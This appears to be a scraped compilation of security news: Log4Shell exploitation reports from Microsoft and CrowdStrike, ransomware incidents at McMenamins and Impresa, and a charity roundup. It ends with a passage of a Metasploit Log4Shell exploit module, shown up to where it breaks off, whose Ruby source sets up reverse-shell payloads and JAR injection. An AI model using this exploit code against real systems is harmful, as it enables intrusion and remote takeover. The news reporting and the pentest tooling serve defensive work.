Microsoft Sees Rampant Log4j Exploit Attempts, Testing

 

Description

No surprise here: The holidays bought no Log4Shell relief.

Threat actors vigorously launched exploit attempts and testing during the last weeks of December, Microsoft said on Monday, in the latest update to its landing page and guidance around the flaws in Apache’s Log4j logging library.

“We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,” according to Microsoft.

This comes on the heels of news that relentless Log4Shell attacks have come from nation-state actors that are both testing and have already implemented the exploit: As of Dec. 15, more than 1.8 million attacks, against half of all corporate networks, using at least 70 distinct malware families, had already been launched to exploit the bugs.

What is Log4Shell?

The remote code execution (RCE) vulnerabilities in Apache Log4j 2 – CVE-2021-44228, CVE-2021-45046, CVE-2021-44832 – are collectively referred to as Log4Shell. Within hours of the initial flaw’s public disclosure on Dec. 10, attackers were scanning for vulnerable servers and unleashing quickly evolving attacks to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT), reverse bash shells for future attacks, Mirai and other botnets, and backdoors.

The new attack vector presented by Log4Shell is vast, severe and has ample potential for widespread exploitation. The flaw, which is uber-easy to exploit, is resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated RCE and complete server takeover.

Within three days of the flaw’s disclosure, it was spitting out mutations. Within 10 days, the notorious Conti ransomware gang had created a holistic Log4Shell attack chain. As of last week, Dec. 30, the advanced persistent threat (APT) Aquatic Panda was targeting universities with Log4Shell exploit tools in an attempt to steal industrial intelligence and military secrets.

Obfuscated HTTP Requests

Most recently, Microsoft has observed attackers obfuscating the HTTP requests made against targeted systems. Those requests generate a log using Log4j 2 that leverages Java Naming and Directory Interface (JNDI) to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload.

Microsoft has observed many attacks in which the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems. The crafted string that enables Log4Shell exploitation contains “jndi,” following by the protocol – such as “ldap,” “ldaps” “rmi,” “dns,” “iiop,” or “http” – and then the attacker domain.

But to evade detection, attackers are mixing up the request patterns: For example, Microsoft has seen exploit code written that runs a lower or upper command within the exploitation string. Even more complicated obfuscation attempts are being made to try to bypass string-matching detections, such as that shown in the string sample below:

Minecraft Servers Still Being Exploited

Exploitation continues on non-Microsoft-hosted Minecraft servers, the company said: as in, the same type of servers where Log4j was first discovered.

Microsoft confirmed public reports of Khonsari ransomware being delivered as payload post-exploitation, as Bitdefender has detailed. Microsoft Defender antivirus data has shown a small number of cases being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader, the company said.

“In these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients,” Microsoft said. “We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of javaw.exe to ransom the device.”

While Minecraft isn’t commonly installed in enterprise networks, Microsoft has nonetheless also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, enabling an actor to fully take over a compromised system, which they then use to run Mimikatz to steal credentials.

“These techniques are typically associated with enterprise compromises with the intent of lateral movement,” Microsoft said, meaning that the goal in targeting of Minecraft users, who tend to be children, seems unclear. It’s early yet in this campaign: There hasn’t yet been detectible follow-on activity yet, “indicating that the attacker may be gathering access for later use.”

Microsoft urged Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.

Nation-State Activity

Microsoft’s Threat Intelligence Center (MSTIC) has also observed the CVE-2021-44228 flaw being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea and Turkey.

The actors are experimenting during development, integrating the vulnerabilities to in-the-wild payload deployment, and sending exploitations against targets.

One example: MSTIC has observed the ransomware-wielding, Iranian Phosphorus actor – aka Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef or Newscaster, et al. – acquiring and making modifications of the Log4j exploit.

“We assess that Phosphorus has operationalized these modifications,” Microsoft observed.

MSTIC has also seen the China-linked Hafnium group using the vulnerability to attack virtualization infrastructure in order to extend the group’s typical targeting. “In these attacks, Hafnium-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems,” researchers noted.

Microsoft’s “I’m-a-broken-record” advice: Update affected products and services, and apply security patches ASAP.

“With nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible,” Microsoft said.

RAT Infestation

Microsoft is also seeing additional remote-access toolkits and reverse shells being dropped via exploitation of CVE-2021-44228, which is malware that actors use for hands-on-keyboard attacks. Besides the Cobalt Strike beacons and PowerShell reverse shells seen in earlier reports, the company has also seen Meterpreter, Bladabindi and HabitsRAT.

“Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally,” Microsoft noted.

The activity is coming from small-scale, possibly more targeted attacks (possibly related to testing campaigns), the software giant said. Also, researchers have observed the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. Microsoft said that the HabitsRAT campaign overlapped with infrastructure used in prior campaigns.

Other Log4Shell Developments

Microsoft has also seen:

Multiple ransomware access brokers using the vulnerability to gain initial access to target networks – access that they sell to ransomware-as-a-service (RaaS) affiliates. “We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms,” Microsoft said.

Mass scanning by both attackers and security researchers.The vulnerability has rapidly gotten sucked up into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. “Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows,” the company said.

No big spikes in ransomware attacks. True, ransomware has been delivered via modified Minecraft clients, but so far it’s been only a small number of cases. That could change, given that access brokers associated with RaaS affiliates are folding the vulnerability into their initial-access toolkits. But Microsoft is also seeing older ransomware payloads in limited use by security researchers and a small number of attackers. “In some instances, they appear to be experimenting with deployments via scanning and modified Minecraft servers,” Microsoft said. “As part of these experiments, some ransomware payloads seem to have been deployed to systems that were previously compromised and were originally dropping coin-miner payloads.”

Webtoos Malware. Webtoos, a malware with distributed denial-of-service (DDoS) capabilities and persistence mechanisms that could allow an attacker to wreak yet more havoc, is also being deployed via the Log4Shell vulnerability. “Attackers’ use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability,” Microsoft said.

Microsoft’s post has extensive advice on attack vectors and observed activity, finding and remediating vulnerable apps and systems, detecting and responding to exploitation attempts and other related attacker activity, and indicators of compromise (IoCs).

This Is Just the Start

As if all that weren’t enough, it’s all likely going to get worse, Microsoft said. Just like Log4j is tucked away into nooks and crannies, so too are exploits going to get added to yet more attacker toolkits: “The majority of attacks we have observed so far have been mainly mass scanning, coin-mining, establishing remote shells and red-team activity, but it’s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits,” Microsoft said.

How Do You Even Know Where Log4J Is Lurking?

A massive part of the Log4Shell nightmare is the fact that it’s not always obvious which software is using a vulnerable version of the Log4j library.

While Microsoft has laid out several methods for detecting active exploit attempts using Log4j, identifying the vulnerable version before an attack would be “ideal,” according to Ray Kelly, a fellow at NTT Application Security.

“This will be a continuing battle for both consumers and vendors going forward into 2022 in what will need to be a two-pronged approach,” Kelly told Threatpost. “Security vendors have been quick on the response for consumers by adding log4j rules that enable DAST [dynamic application security scanning] scanners to detect if a website can be exploited with a malicious log4j web request against a company’s web server. At the same time, vendors must ensure that they are not shipping software with the vulnerable version using tools such as SCA [service component architecture].”

Asking What to Do? It’s a Little Late for That

Jake Williams, co-founder and CTO at BreachQuest, echoed Microsoft’s assertion that this vulnerability will have an extremely long tail for exploitation, considering that many organizations don’t even realize they’re running vulnerable software.

“Unfortunately (and nobody wants to hear this), there’s nothing left to say about remediating log4j that hasn’t already been said hundreds of times,” Williams told Threatpost. “Any organization asking today what they need to do regarding log4j almost certainly has an incident on their hands. Every organization with a security team knows what needs to be done to hunt down log4j, they just need the resources and political backing to actually get it done. Being exploited through an internet-facing system running vulnerable log4j at this point is a leadership failure, not a technical one.”

Password****Reset: ****On-Demand Event: Fortify 2022 with a password-security strategy built for today’s threats. This Threatpost Security Roundtable, built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken.Register & stream this FREE session today – sponsored by Specops Software.

Read More

5 Security Projects That Are Giving Back

 

Description

Editor’s note:We had planned to publish our Hacky Holidays blog series throughout December 2021 – but then Log4Shell happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it’s 2022, we’re feeling in need of some holiday cheer, and we hope you’re still in the spirit of the season, too. Throughout January, we’ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let’s pick up where we left off.

While it’s always nice to receive gifts, the holiday season is more about giving – whether you’re buying something nice for the people you love or giving back to the community to help ensure others enjoy the holidays as much as you do.

Giving back is exactly what we’ll be focusing on in today’s Hacky Holidays post, as it’s a theme that truly resonates with those in the security industry. From white-hat hackers to those volunteering their time to make the internet a safer, more inclusive space, we’ve highlighted a few security-related projects that exemplify the spirit of giving back.

1. The Innocent Lives Foundation

The Innocent Lives Foundation aims to identify child predators and help bring them to justice. They do this by leveraging the combined power of the information security community to create tools that unmask anonymous child predators online. Then, using the data from Open Source Intelligence and cutting-edge techniques, they build a path to capturing evidence and then pass on those details to law enforcement for them to recreate.

The Innocent Lives Foundation was first started by Chris Hadnagy, who joined us on an episode of our Security Nation podcast back in 2020. He worked on a few cases at Social-Engineer, LLC, that tracked and captured predators who trafficked and exploited children. When he saw the impact these crimes had on innocent people, he knew he had to do something about it. As a leader in the information security community, he chose to rally a group of security experts and professionals in the social engineering field to address these problems and prevent crimes against future victims.

The foundation is serving endangered children and building a world in which all children can live innocent lives. It’s difficult, emotionally taxing work, but it’s making the world a better place, and it’s the perfect example of giving back.

If you’d like to donate to the cause — it can cost up to $10,000 to produce one file to send to law enforcement, so donations are needed and welcomed — you can do so here. Aside from donating, there are numerous other ways to get involved, including reporting a case, sharing support online, or even volunteering your security skills when applications are opened.

2. No More Ransom

Today, ransomware is rampant. This fact won’t surprise anyone working in the security industry, but many normal users around the world don’t know what ransomware is, how to defend against it, and what to do if they fall victim to a scam. That’s where No More Ransom comes into play.

No More Ransom is an initiative by the National High Tech Crime Unit of the Netherlands’ police, Europol’s European Cybercrime Centre, Kaspersky, and McAfee with a simple mission: to help victims of ransomware retrieve their encrypted data without paying criminals a single dime in the process.

The initiative aims to achieve this mission in two ways:

1. By compiling a repository of keys and applications that can decrypt data locked by different types of ransomware
2. By spreading awareness about ransomware and educating the world about prevention methods they can employ in their daily lives

While it’s not always possible to regain access to files encrypted by or systems locked by ransomware, No More Ransom has helped many do exactly that with its repository. And by sharing simple, easy-to-follow cybersecurity advice, the initiative is creating a better informed world of users who understand how to prevent falling victim to ransomware in the first place.

In the 5 years of since its creation, the No More Ransom initiative has:

• Built a library of 121 free tools
• Been able to decrypt 151 ransomware families
• Seen more than 6 million downloads of its tools
• Prevented $900 million in criminal profit

If you’d like to do your part, the No More Ransom project is always looking for new partners to spread their messaging, so if your organization wants to be more security-minded and give back to the security community in general, consider joining the list of many partners. If you ever fall victim to ransomware, you can also report the crime, which will help identify new types of ransomware and aid future prevention.

3. CIAS Gaming

Established by the University of Texas at San Antonio, the Center for Infrastructure Assurance and Security (CIAS) conducts research into effective ways to engage students with cybersecurity principles through educational gaming — and as part of their work, they’re making cybersecurity relatable, fun, and engaging for kids.

The CIAS Gaming program targets 4 demographics: elementary school, middle school, high school, and colleges and universities. Their mission is to deliver quality research, training, competition, and exercise programs to advance community and organizational cybersecurity capabilities and collaboration.

Currently, the CIAS K-12 Program consists of a few educational tools. These include:

• A collectible card game and electronic download called Cyber Threat Defender
• A multiplayer card game for students in third through fifth grade called Cyber Threat Protector
• A card game for K-2 players with simple design and reinforced concepts called Cyber Threat Guardian
• An electronic game that teaches techniques for encoding and decoding ciphers to hide or discover information called Project Cipher
• A testing tool and platform that gives educators a way to create quizzes and introduce students to cybersecurity principles called the Pyramid of Knowledge
• Interactive activities, like activity sheets and games, introduced to kids by the CyBear cybersecurity mascots

CIAS Gaming is shaping the future of cybersecurity by training the next generation in cybersecurity best practices. You can access and download these tools and games via the links above, or reach out directly to CIAS to learn more about taking part in their competitions or trainings.

4. The Alliance for Securing Democracy

The Alliance for Securing Democracy (ASD) is a nonpartisan initiative housed within the German Marshall Fund of the United States that aims to combat autocratic efforts to undermine and interfere in democratic institutions around the world. The ASD contributes research and analysis on how a range of tools, from cyberattacks and disinformation to support for extremism, are being used to weaken democracies. It also provides public dashboards to expose the effects of online influence networks and the themes being promoted by foreign powers to threaten democratic institutions.

The ASD is independently funded by more than 175 private individuals and small family foundations across the political spectrum. Its team brings together a diverse staff with expertise across industries, including technology and cybersecurity, to provide research, policy recommendations, and even analysis of key issues and threats. It also has a technical advisory committee that features experts on disinformation, cybersecurity, illicit finance, and more.

The ASD has conducted a significant amount of work in the area of cybersecurity. It also has compiled a toolbox to spread awareness on various techniques being used by malign actors. Such tools include:

• The Authoritarian Interference Tracker, which exposes Russia and China’s foreign interference activities
• The Information Operations Archive, which houses data points from known Information Operations
• The Hamilton 2.0 Dashboard, which reveals autocracies’ state-backed messaging

In a more globalized and digitalized world, the work ASD is doing to protect the strength of free and open societies by shining a light on autocratic tactics, closing vulnerabilities in democratic systems, and imposing costs on those who undermine our institutions is more important than ever. You can reach them at info@securingdemocracy.org or donate to the cause.

5. Code for Social Good

Code for Social Good is a nonprofit organization that partners with other nonprofit companies to provide the technical help they need to achieve their missions for no cost. It’s all about volunteering to promote social good: Code for Social Good has built and fostered a volunteer community that promotes welfare by supporting nonprofits in need. And that global network consists of professionals from across the tech industry, including technical writers, coders, programmers, and more.

Whether you code for fun, experience, social good, or to make a better world, volunteering at Code for Social Good is a great way to give back. Anyone can sign up as a volunteer, and then, you can browse their list of projects. If you find one applicable to your skills, you can apply and wait for contact from the nonprofit. Nonprofits that need help can also post projects on the site and find volunteers to assist them.

As of this writing, Code for Social Good has 138 projects posted across 122 organizations based in 87 countries. The current volunteer community consists of 2,595 volunteers, and they’re always looking for more help. If you have some extra time, why not take a look and see if you can give back by volunteering your technical skills to a nonprofit in need.

Giving back is an important theme of the holidays and one that’s integral to the cybersecurity community. By giving back to the industry, we can encourage a healthy, flourishing practice that spreads awareness, leading to a better, safer, and brighter tomorrow.

If you’re looking for ways to give back, hopefully these examples inspire you to action. If you’d like to stay in the holiday spirit, check out the rest of our Hacky Holidays specials.

NEVER MISS A BLOG

Read More

McMenamins Data Breach Affects 12 Years of Employee Info

 

Description

A ransomware attack on the McMenamins dining and hospitality empire in the Pacific Northwest came along with a data breach covering 12 years of employee data, the organization has confirmed.

The Dec. 12 incident – which some have attributed to the Conti gang – forced McMenamins to shut down various operations, though locations can still receive customers. McMenamins is known for saving and restoring historic buildings throughout Oregon and Washington state and for giving them new lives as eclectic pubs, restaurants, breweries, hotels, movie theaters, concert venues, spas and more. In fact, 20 of its locations are on the National Register of Historic Places.

This week, McMenamins confirmed that the cyberattackers made off with internal employee data for those working for the company between the dates of Jan. 1, 1998 and June 30, 2010. The affected data is a bouillabaisse of classic HR fare: names, addresses, telephone numbers, email addresses, dates of birth, race, ethnicity, gender, disability status, medical notes, performance and disciplinary notes, Social Security numbers, health insurance plan elections, income amounts, and retirement contribution amounts.

The data could be sold and/or used for phishing attacks and other social-engineering efforts, identity theft and more.

“It’s possible that the thieves accessed files containing direct-deposit bank account information as well, but McMenamins does not have a clear indication they did so,” the company said in a Dec. 30 notice.

One ray of promise: No customer data was heisted, the company said.

“We’re devastated our people need to do so, but we’re urging them to vigilantly monitor their accounts and healthcare information for anything unusual,” said Brian McMenamin, one of the brothers who own the business, in a press statement. “They should immediately notify their financial institutions or health providers if they see anything out of sort. They should sign up immediately for free monitoring and identity-theft protection. All the information is on our website, and we encourage them to call with any questions.”

McMenamins said that it is offering past and current employees identity and credit-protection services, as well as a dedicated call center to answer questions about the attack. Letters have gone out to notify all affected individuals as well.

Still Not Recovered from December Ransomware Attack

In the wake of the attack, the company was forced to shut down its IT systems, credit-card point-of-sale systems and corporate email to prevent the further spread of the attack. Three weeks later, the company’s operations are still not remediated, it said, including its central phone system, email, credit-card processing, hotel-reservation system and gift-card processing – core functions for a hospitality group.

For now, the company is asking people to delay their hotel bookings or to call properties directly, and it’s using the third-party Dinerware point-of-sale for credit cards.

“It is unknown when the issue will be resolved and systems back up and running,” the organization said. “Given the impacts to the company’s email system, email responses are delayed.”

Brian McMenamin said the breach “is especially disheartening” given its timing after the “strain and hardship” McMenamins’ employees have gone through over the past two years during the pandemic.

McMenamins has reported the incident to the FBI and is also working with a cybersecurity firm to identify the source and full scope of the attack, the company said.

Some sources have attributed the attack to the Russian-speaking Conti gang – a group that Palo Alto Networks has called “one of the most ruthless” and sophisticated ransomware groups out there. Conti is known to ask for unreasonable ransom amounts, such as the $40 million ransom demand it made of Broward County Public Schools in Fort Lauderdale, Fla., earlier this year. It also has a history of hitting organizations while they’re down, as seen in a May attack on the Irish health service.

It also recently tinkered with its code (and its personnel recruiting) to juice its ability to find and fully destroy backups that victims may otherwise use to restore operations in the wake of a ransomware hit. And, in late December, Conti became one of the first professional gangs to claim a full Log4Shell exploit chain.

Read More

Portugal Media Giant Impresa Crippled by Ransomware AttackMedia Giant Impresa Crippled by Ransomware Attack

Description

Media giant Impresa, which owns the largest television station and newspaper in Portugal, was crippled by a ransomware attack just hours into 2022. The suspected ransomware gang behind the attack goes by the name Lapsus$.

The attack included Impresa-owned website Expresso newspaper and television station SIC. Both remain offline Tuesday morning as the media giant continued its recovery from a New Year’s weekend attack. Impacted is the server infrastructure critical to Impresa’s operations. Additionally compromised is one of Impresa’s verified Twitter accounts, which was hijacked and used to taunt the company publicly.

Various news outlets also reported the attack, including SIC Noticias, SIC’s news TV station, which tweeted a confirmation of the incident, and Portugal’s Observador newspaper.

“The Impresa group confirms that its Expresso and SIC sites, as well as some of their social media pages, are temporarily unavailable, apparently the target of a computer attack, and that actions are being taken to resolve the situation,” according to the tweet.

Lapsus$ identified itself as the culprit of the attack by defacing all of Impresa’s sites with a ransom note letting the company know that it had gained access to Impresa’s Amazon Web Services account, according to a screenshot of the note posted online by The Record.

Pressure to Pay

It appears Impresa was able to regain control over the account on Monday when all of the sites were put into maintenance mode, showing notes on respective home pages that they were temporarily unavailable.

However, Lapsus$ kept up the pressure on Impresa via Twitter, tweeting from Expresso’s verified Twitter account on Monday to demonstrate that it still had access to company resources, according to Recorded Future.

Neither the company nor Lapsus$ so far has revealed the amount of the extortion payment associated with the incident, which marks the first time the group has attacked an entity in Portugal, Lino Santos, the coordinator of Portugal’s National Cybersecurity Center, told the Observador.

Lapsus$ Group came on the ransomware scene in 2021 and so far is best known for an attack on the Brazil Ministry of Health last month. The incident took down several online entities, successfully wiping out information on citizens’ COVID-19 vaccination data as well as disrupting the system that issues digital vaccination certificates.

More Ransomware on the Way

The attack shows that the significant ramp-up in ransomware attacks in 2021 show no signs of slowing in the new year.

“Ransomware is not going away,” Dave Pasirstein, chief product officer and head of engineering for TruU wrote in an email to Threatpost. “It’s a lucrative business that is nearly impossible to protect against all risk vectors.”

Read More

APT ‘Aquatic Panda’ Targets Universities with Log4Shell Exploit Tools

 

Description

Cyber criminals, under the moniker Aquatic Panda, are the latest advanced persistent threat group (APT) to exploit the Log4Shell vulnerability.

Researchers from CrowdStrike Falcon OverWatch recently disrupted the threat actors using Log4Shell exploit tools on a vulnerable VMware installation during an attack that involved of a large undisclosed academic institution, according to research released Wednesday.

OverWatch quickly notified the organization of the activity so the target could “begin their incident response protocol,” researchers said.

CrowdStrike, among other security firms, has been monitoring for suspicious activity around a vulnerability tracked as CVE-2021-44228 and colloquially known as Log4Shell that was found in the Apache Log4j logging library in early December and immediately set upon by attackers.

Ever-Widening Attack Surface

Due to its ubiquitous use, many common infrastructure products from Microsoft, Apple, Twitter, CloudFlare and others are vulnerable to Log4Shell attacks. Recently, VMware also issued guidance that some components of its Horizon service are vulnerable to Log4j exploits, leading OverWatch to add the VMware Horizon Tomcat web server service to their processes-to-watch list, researchers said.

The Falcon OverWatch team noticed the Aquatic Panda intrusion when the threat actor performed multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, executed under the Apache Tomcat service running on the VMware Horizon instance, they wrote in the post.

“The threat actor then executed a series of Linux commands, including attempting to execute a bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat-actor tooling hosted on remote infrastructure,” researchers wrote.

The commands were executed on a Windows host under the Apache Tomcat service, researchers said. They triaged the initial activity and immediately sent a critical detection to the victim organization, later sharing additional details directly with their security team, they said.

Eventually, researchers assessed that a modified version of the Log4j exploit was likely used during the course of the threat actor’s operations, and that the infrastructure used in the attack is linked to Aquatic Panda, they said.

Tracking the Attack

OverWatch researchers tracked the threat actor’s activity closely during the intrusion to provide continuous updates to academic institution as its security administrators scrambled to mitigate the attack, they said.

Aquatic Panda engaged in reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. Researchers also observed the group attempt discover and stop a third-party endpoint detection and response (EDR) service, they said.

The threat actors downloaded additional scripts and then executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. They also retrieved three files with VBS file extensions from remote infrastructure, which they then decoded.

“Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking,” researchers wrote.

Aquatic Panda eventually made multiple attempts to harvest credentials by dumping the memory of the LSASS process using living-off-the-land binaries rdrleakdiag.exe and cdump.exe, a renamed copy of createdump.exe.

“The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\temp\ directories,” researchers wrote.

The victim organization eventually patched the vulnerable application, which prevented further action from Aquatic Panda on the host and stopped the attack, researchers said.

New Year, Same Exploit

As 2021 comes to a close, it’s likely Log4Shell and exploits developed so attackers can use it for nefarious activity will carry their disruption into the new year.

“The discussion globally around Log4j has been intense, putting many organizations on edge,” OverWatch researchers wrote. “No organization wants to hear about such a potentially destructive vulnerability affecting its networks.”

Indeed, the flaw already has created considerable headache for organizations and security researchers alike since its discovery earlier this month. Attackers immediately jumped on Log4Shell, spawning 60 variants of the original exploit created for the flaw in a 24-hour period when it was first revealed. Though Apache moved quickly to patch it, the fix also turned problematic, creating a vulnerability of its own.

Moreover, Aquatic Panda also is not the first organized cybercrime group to recognize the opportunity to exploit Log4Shell, and likely not be the last. On Dec. 20, the Russia-based Conti ransomware gang—known for its sophistication and ruthlessness–became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability with the creation of a holistic attack chain.

CrowdStrike urged organizations to remain abreast of the latest mitigations available for Log4Shell and overall Log4j vulnerabilities as the situation evolves.

Read More

Chinese APT Hackers Used Log4Shell Exploit to Target Academic Institution

 

Description

A never-before-seen China-based targeted intrusion adversary dubbed Aquatic Pandahas been observed leveraging critical flaws in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems.

Cybersecurity firm CrowdStrike said the infiltration, which was ultimately foiled, was aimed at an unnamed “large academic institution.” The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology, and government sectors.

The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch threat actor payloads hosted on a remote server.

“A modified version of the Log4j exploit was likely used during the course of the threat actor’s operations,” the researchers noted, adding it involved the use of an exploit that was published in GitHub on December 13, 2021.

Aquatic Panda’s malicious behavior went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.

But after the victim organization was alerted to the incident, the entity “was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.” In light of the attack’s successful disruption, the exact intent remains unknown.

Read More

Log4Shell HTTP Header Injection

 

Description

Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload. The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the target can connect to. The targeted application must have the trusted code base option enabled for this technique to work. The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Log4Shell
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::CheckModule
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(_info = {})
    super(
      'Name' => 'Log4Shell HTTP Header Injection',
      'Description' => %q{
        Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,
        log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.

        This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that
        will trigger an LDAP connection to Metasploit and load a payload.

        The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP
        server in addition to the LDAP server that the target can connect to. The targeted application must have the
        trusted code base option enabled for this technique to work.

        The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to
        run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target
        application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.
      },
      'Author' => [
        'Michael Schierl', # Technical guidance, examples, and patience - all of the Jedi stuff
        'juan vazquez', # 2011-3544 building blocks reused in this module
        'sinn3r', # 2011-3544 building blocks reused in this module
        'Spencer McIntyre', # Kickoff on 2021-44228 work, improvements, and polish required for formal acceptance
        'RageLtMan <rageltman[at]sempervictus>' # Metasploit module and infrastructure
      ],
      'References' => [
        [ 'CVE', '2021-44228' ],
      ],
      'DisclosureDate' => '2021-12-09',
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'SRVPORT' => 389,
        'WfsDelay' => 30,
        'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'
      },
      'Targets' => [
        [
          'Automatic', {
            'Platform' => 'java',
            'Arch' => [ARCH_JAVA],
            'RemoteLoad' => true,
            'DefaultOptions' => {
              'PAYLOAD' => 'java/shell_reverse_tcp'
            }
          }
        ],
        [
          'Windows', {
            'Platform' => 'win',
            'RemoteLoad' => false,
            'DefaultOptions' => {
              'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
            }
          },
        ],
        [
          'Linux', {
            'Platform' => 'unix',
            'RemoteLoad' => false,
            'Arch' => [ARCH_CMD],
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_bash'
            }
          },
        ]
      ],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'AKA' => ['Log4Shell', 'LogJam'],
        'Reliability' => [REPEATABLE_SESSION],
        'RelatedModules' => [ 'auxiliary/scanner/http/log4shell_scanner' ]
      }
    )
    register_options([
      OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
      OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
      OptString.new('HTTP_HEADER', [ false, 'The HTTP header to inject into' ]),
      OptEnum.new('JAVA_GADGET_CHAIN', [
        true, 'The Java gadget chain to use for deserialization', 'CommonsBeanutils1',
        Msf::Exploit::JavaDeserialization.gadget_chains
      ], conditions: %w[TARGET != Automatic]),
      OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080], conditions: %w[TARGET == Automatic])
    ])
    register_advanced_options([
      OptPort.new('HttpListenerBindPort', [false, 'The port to bind to if different from HTTP_SRVPORT'])
    ])
  end

  def check
    validate_configuration!

    @checkcode = super
  end

  def check_options
    opts = { 'LDAP_TIMEOUT' => datastore['WfsDelay'], 'URIS_FILE' => nil }
    opts['HEADERS_FILE'] = nil unless datastore['HTTP_HEADER'].blank?
    opts
  end

  def resource_url_string
    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"
  end

  #
  # Use Ruby Java bridge to create a Java-natively-serialized object
  #
  # @return [String] Marshalled serialized byteArray of the loader class
  def byte_array_payload(pay_class = 'metasploit.PayloadFactory')
    jar = generate_payload.encoded_jar
    serialized_class_from_jar(jar, pay_class)
  end

  #
  # Insert PayloadFactory in Java payload JAR
  #
  # @param jar [Rex::Zip::Jar] payload JAR to update
  # @return [Rex::Zip::Jar] updated payload JAR
  def inject_jar_payload_factory(jar = generate_payload.encoded_jar)
    # From exploits/multi/browser/java_rhino - should probably go to lib
    paths = [
      [ 'metasploit/PayloadFactory.class' ]
    ]
    paths.each do |path|
      1.upto(path.length - 1) do |idx|
        full = path[0, idx].join('/') + '/'
        jar.add_file(full, '') unless jar.entries.map(&:name).include?(full)
      end
      File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', path), 'rb') do |fd|
        data = fd.read(fd.stat.size)
        jar.add_file(path.join('/'), data)
      end
    end
    jar
  end

  def build_ldap_search_response_payload
